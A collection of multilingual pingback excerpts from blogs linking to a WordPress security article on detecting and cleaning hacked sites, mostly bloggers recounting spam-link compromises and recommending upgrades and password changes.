[...] a blogs que utilitzen WordPress que va fer que bastants d’aquests blogs quedessin inactius; Donncha O Caoimh va donar una sèrie de passos per saber si el teu blog havia estat atacat. Ara acaba de [...]
[...] website WSOS). It appears that hackers gained access to numerous out-of-date wordpress blogs (details and fixes here) and used wordpress to send many, many spam [...]
[...] Changes Notifications for Your Wordpress Blog on Linux Did your WordPress site get hacked? Three tips to protect your WordPress installation 10 Ways to Secure your Wordpress Install [...]
[...] I had been rather diligent in updating software but fell into a lull after 2.0.3 of WordPress. I rarely, if ever, check my stats so I’m not sure how long it has been happening, but something got hacked. If you run WordPress, check your stats and then go here. [...]
[...] on the site (it never was required) and did everything that the article I linked to yesterday from Holy Schmoly recommended. The hardest thing was to change the database table prefixes and while I found a script [...]
[...] also has a good technical analysis of the exploit in his post – Did your WordPress site get hacked? And JD posted how to manually get rid of the hacks – Patching the WordPress AnyResults.Net [...]
[...] upgraded the site to the latest version of WordPress. Unfortunately there was a vulnerability in the older version I was using which led to it being hacked by a bot. About 100k of links to a dodgy pharmacy site had [...]
[...] Did your WordPress site get hacked? deals with the latest exploit of the WordPress and how to fix it. [...]
[...] my RSS feed or by Email. Thanks for visiting!WordPress blogs are starting to get hacked in greater numbers lately. The problem is getting serious enough that the WordPress podcast recently addressed out of [...]
[...] erfahren musste. Eine ziemlich gute Anleitung zum richtigen Vorgehen findet sich zum Beispiel bei Holy Shmoly!. von BloggingTom, abgelegt unter BloggingPermalink | Trackback URI print it! | yigg it! | wong [...]
[...] empfehle ich natürlich meinen Retter BloggingTom (danke vielmals an dieser Stelle) und Holy Shmoly (englische Anleitung zum beheben von [...]
[...] on how to solve it and my head is about to burst. Lucky this site explains things clearer – Is your Wordpress hacked? They’re also uploading PHP code disguised as jpeg files to your upload directory and adding [...]
[...] code was placed in my theme’s header file, base64 encoded just as the article said it would [...]
[...] Did Your WordPress Site get Hacked? [...]
[...] the link given by Genkisan, I found this useful tutorial on ‘Did your Wordpress site get hacked?‘ They’re also uploading PHP code disguised as jpeg files to your upload directory and [...]
[...] If you noticed the site looking funny Sunday morning, it’s because I was reinstalling the blog software that I use, which is called WordPress. Some time in the last month or two this blog was hacked, through a vulnerability in WordPress that is described here. [...]
[...] where my blog is hacked by unknown attacker or two, I become a little bit paranoid. Thanks to Holy Shmoly, there is somewhat a definite guide on how to ‘harden’ your wordpress [...]
[...] Nik Cubrilovic wrote on TechCrunch about how a blog of his was hacked in June. He offers some interesting observations. For practical, WordPress-specific advice, there are a bunch of tips here and Donncha O Caoimh offers a technically-minded look at some of the issues. [...]
[...] Did your WordPress site get hacked? (tags: wordpress security) [...]
[...] Doncha’s excellent (and more recent) write-up of how to deal with a hacked WordPress installat… [...]
[...] One of the Wordpress developers posts: Did your WordPress site get hacked? [...]
[...] links from Kulpreet include WordPress Security White Paper, and “Did your WordPress site get hacked?” featuring samples of what a hacked site would look like. Digg it Add to del.icio.us [...]
[...] Did Your Wordpress site Get Hacked? >> Holy Shmoly! [...]
[...] Scanner 0.1 has been released, in response to a comment on a recent thread about old versions of WordPress sites being hacked. You may have spotted this in your WordPress dashboard. Problem is, it only works for v2.5.1+, so [...]
[...] Dat leek mij wel heel erg sterk, maar het was wel waar. Een hacker heeft een exploit in Wordpress gevonden en maakt daar nu dankbaar van gebruik. Wat er gebeurt is dat er een (onzichtbaar) commentaar aan de tekst van een link in een blogpost wordt toegevoegd. Op het moment dat je vervolgens de blogpost leest, probeert de browser de link te volgen. De link verwijst naar een gemene site ergens in China, waardoor in theorie de lezer een virus (Trojan Horse) kan krijgen. Meer informatie over de “exploit” is op de Wordpress site te vinden. Meer informatie (inclusief een script waarmee je de Wordpress installatie kunt controleren op exploits en hacks) kun je vinden op deze site. [...]
[...] {from bloggerguide.net} {from ocaoimh.ie} [...]
[...] will make it less likely. If you ever find yourself in the same situation as me check out this post. I found it very [...]
[...] read about this and took steps to recover my blog. The old theme is the culprit. I got rid of it and am upgrading [...]
[...] the most helpful article was Did Your Site Get Hacked. Why, yes it did. You might also consult Wordpress Security [...]
[...] suspect that this site was hacked by bots. I think that the culprit is an old plugin I never updated. That, and the security was [...]
[...] links A blog post about securing your wordpress blog How to upgrade your wordpress [...]
[...] links</em>:</strong> <a href=”http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/”>A blog post about securing your wordpress blog</a> <a [...]
[...] post that tells you how to know if your Wordpress blog has been hacked, and what to do about it: Holy Shmoly!. GREAT POST! Bookmark [...]
[...] my site had been hacked and had a stream of links to Anti-Virus sites above the top header. After a quick Google it turned out to be an easy fix, but it reminded me of my former days of scanning code for a [...]
[...] Vancouver Techie blogger Jan Karlsberg also has some advice for Wordpress bloggers (and companies running their websites off the Wordpress platform) to protect themselves with a little code review. He knows, because his Wordpress blog got hacked – and he fixed it. Some other Wordpress anti-hack tips here. [...]
[...] Most of the fixes are well beyond the scope of this blog. However, if you are mysql and php literate, you may want to start with this post at the wordpress.org forums and read Doncha’s post on Did Your Wordpress Site Get Hacked? [...]
[...] Did your WordPress site get hacked? – Donncha [...]
[...] Did your WordPress site get hacked? [...]
[...] WP site hacked? Holy Shmoley knows what to do. [...]
[...] Donncha (one of the original Wordpress founders, remember that name in your first blogroll?) for catching an insidious trick that’s inherent in some Wordpress templates. Irrelevant links on your site can drain off your [...]
[...] Blogs I look after got hacked again by an “online pharmacy”. Of course I’m not the only one. It was the second hack with 3 months of this WordPress [...]
[...] Blogs I look after got hacked again by an “online pharmacy”. Of course I’m not the only one. It was the second hack with 3 months of this WordPress [...]
[...] Holy Shmoly: Did Your Website Get Hacked? [...]
[...] found an article by Donncha, Did your WordPress site get hacked?. Fcuking A for [...]
[...] Did your Wordpress site get hacked? Malicious script injection on my [...]
[...] 1) reset your admin password by following the instructions above 2) immediately upgrade to the newest version of Wordpress 3) backup the database used for your blog. (usually you do this when upgrading, but if you’re a frequent blogger, backup more frequently. 3) create a new password that isn’t easy to break. include odd characters like ! +))^& and throw in an occasional upper case letter along with numbers. 4) check out the excellent suggestions at http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress developer. In the meantime, I’ll be busy backing [...]
[...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress [...]
[...] Googling a number of times, I found this post which I think explains what happened to my site. I tried updating to the newest version but still, [...]
[...] til blogg, ftp og database. For andre WordPress bloggere vil jeg anbefalte å ta en titt på dette innlegget. (Takk til Kristin for linken via [...]
[...] http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] seperti di sini atau di sini. Atau ada tutorial lain lebih lengkap untuk kasus yang agak beda di sini atau reference dari blog ShoeMoney dengan kasus hampir mirip di sini dan lain-klain tentu di [...]
[...] those of you who want more: Read an interesting article about a Wordpress blog being [...]
[...] installs : If you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
[...] Click here to read post [...]
[...] du dig hotad? Besök Holy Shmoly! för mer [...]
[...] you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
[...] Actualización 17-03-09: Todos los problemas han sido arreglados. Finalmente NO fue un fallo de Wordpress, sino que otra de las personas que comparte el servidor con nosotros instaló algún tipo de aplicación de dudosa seguridad y muy probablemente eso permitió que se accediera al servidor y añadieran código malicioso a muchos de los archivos php de mi instalación de Wordpress. La solución a todo esto me la han facilitado desde el hilo que abrí en el foro de soporte técnico de Wordpress, por lo que dejo aquí en el enlace para todo aquel al que pueda servirle de ayuda en caso de haber padecido este mismo ataque. Concretamente, la web que proporciona las soluciones es: http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] BlogSecurity is a blog that provides information about maintaining Wordpresss Security. Holy Shmoly has a great blog post entitled “Did your Wordpress Blog Get Hacked?” and it provides a [...]
[...] i miei siti: “Exploit Redirects Googlebot to Malware Sites (Bablo me uk)” e “Did your WordPress site get hacked?“, piuttosto [...]
[...] this was quite a challenging task as I wasn’t sure what or where to look. I found this article which gave a few pointers. I have yet to follow all the instructions but this is what I’ve [...]
[...] you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
[...] İlk olarak wordpressin son sürümünü indirin ve sistem dosyalarını bir güzel yenileriyle değiştirin. Sonra sonradan eklenen dosylardaki (tema, eklenti gibi) zararlı kodları temizleyin. Web siteniz ile en ilgili olandan başlayıp bütün şifrelerinizi değiştirin. Kaliteli ve kullanışlı şifreleri üretmeyi öğrenin. Bu biraz ironik ama windowsunuzu güvenli tutun. Neyseki bu olay bir tek benim başıma gelmemiş. Eğer sizde bu durumla baş başa iseniz aşağıdaki linklerden faydalanabilirsiniz ; http://wordpress.org/support/topic/263085 http://wordpress.org/support/topic/261886 http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] You can read more about .htaccess from here. I checked my blog and it was working fine. CallingAllGeeks was up and running again. So, in all it [...]
[...] http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] være på bloggen din, kan du gå igjennom denne listen. Vil du vite hvordan en hacker jobber, er denne siden litt grei å lese, men dog veldig [...]
[...] enough as we’re all vulnerable here. If you’re more tech savvy, here’s a post by Holy Shmoly! which tacles hacked php scripts on WordPress and how they look [...]
[...] Open source Exploits The open source platforms are now an easy target for hackers to exploit and use the malicious codes. The last thing that we need is a hacked site with a very good SERP. If you are interested in a serious article this is the place to go. http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] spam. No estoy segura de haber limpiado todo lo que tenía que limpiar. Pero hice lo que pude. Aquí hay más información para verificar si tienen el mismo problema. (Tu no Javi, ya confirme que no tuvieras el mismo [...]
[...] Did your WordPress site get hacked? [...]
[...] Well, it was clearly a bad news : the site ajaxplorer.info was hacked during on the 13 july 2009, naturally just the night before an important gig, so I had to put it down for a few days. But the good news is that it had nothing to do with the AjaXplorer installed on the server, but it was a wordpress security problem. My fault, i had not updated the wordpress install, and I will right now subscribe the wordpress rss feed telling urging to upgrade when they find a problem. For those using wordpress, have a look here if you don’t have updated already : http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] Did your WordPress site get hacked? [...]
[...] Found another older post, but more good suggestions there. For example, I did review my .htaccess file and found it a bit [...]
[...] this hack news from June 2008 or March 2007 But this news .. news .. news .. news [...]
[...] recently, I followed some of the steps mentioned by Jaypee, Donncha O Caoimh and the WP [...]
[...] Did your Wordpress site get hacked? [...]
[...] advice: Holy Shmoly! and My Digital [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] How To Completely Clear Your Hacked WordPress Installation Hardening WordPress Did Your WordPress Site Get Hacked? 20 WordPress Security Plugins (don’t overdo it, though) Share this on del.icio.usDigg this!Share [...]
[...] you think you’ve been hacked, I’ve spotted a couple of useful guides to dealing with the aftermath. Wordpress, php hack, php, security, [...]
[...] went to Wordpress support for suggestions, and found a few helpful links (Lorelle)(Donncha) I learned from Lorelle - btw, everyone who uses wordpress should know Lorelle!- that [...]
[...] Holy Shmoly recommends keeping updated to the latest version of wordpress to protect against hackers. In addition to that, you should also change your passwords, remove any other users, change your wordpress config “secret key” and delete any malicious codes left by the hacker which may allow them to get in again in future. If you’re like me and have no idea how to find malicious scripts, Holy Shmoly also explains how you can identify and remove them. [...]
[...] Did your WordPress site get hacked? [...]
[...] as well go all the way and have longer (and more complicated) passwords created. Good References http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ http://enthusiasm.cozy.org/archives/2010/01/argh-blog-hacked [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ http://forum.kaspersky.com/lofiversion/index.php/t104035.html [...]
[...] Did your Wordpress Site get hacked is a good pointer to fixing things. It is pretty insidious what can happened: [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]